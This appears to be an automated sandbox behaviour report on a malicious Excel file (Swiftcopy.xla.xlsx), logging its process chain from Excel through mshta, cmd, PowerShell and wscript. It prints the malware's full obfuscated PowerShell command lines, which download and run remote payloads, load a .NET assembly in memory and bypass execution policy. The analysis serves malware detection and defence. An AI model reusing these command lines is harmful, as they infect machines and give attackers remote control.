      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................?..l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.7.0........l.....Wr.....(.P.............(.......(.......$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................?..l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia........l.....Wr.....(.P.............(.......(...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................_..l....}..w.....F......\.......................(.P.............(.......h...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................_..l....}..w.....F......\.......................(.P.............(.......h...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.2.1........l.....Wr.....(.P.............(...............$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(...............j.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia........l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................U.n.a.b.l.e. .t.o. .f.i.n.d. .t.y.p.e. .[.d.n.l.i.b...I.O...H.o.m.e.]...(.......X.......H.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................-.l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.0.0.....o,.l.....Wr.....(.P.............(.......X.......$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................-.l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....o,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....o,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .u.n.t.i.m.e.E.x.c.e.p.t.i.o.n.....o,.l.....Wr.....(.P.............(.......X.......$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....o,.l.....Wr.....(.P.............(...............T.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia.....o,.l.....Wr.....(.P.............(.......X...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(...............j.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................+.l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.9.3.3......+.l.....Wr.....(.P.............(...............$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................+.l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Swiftcopy.xla.xlsxVirustotal: Detection: 14%
      Source: Swiftcopy.xla.xlsxReversingLabs: Detection: 15%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA.tmp" "c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA.tmp" "c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP"Jump to behavior
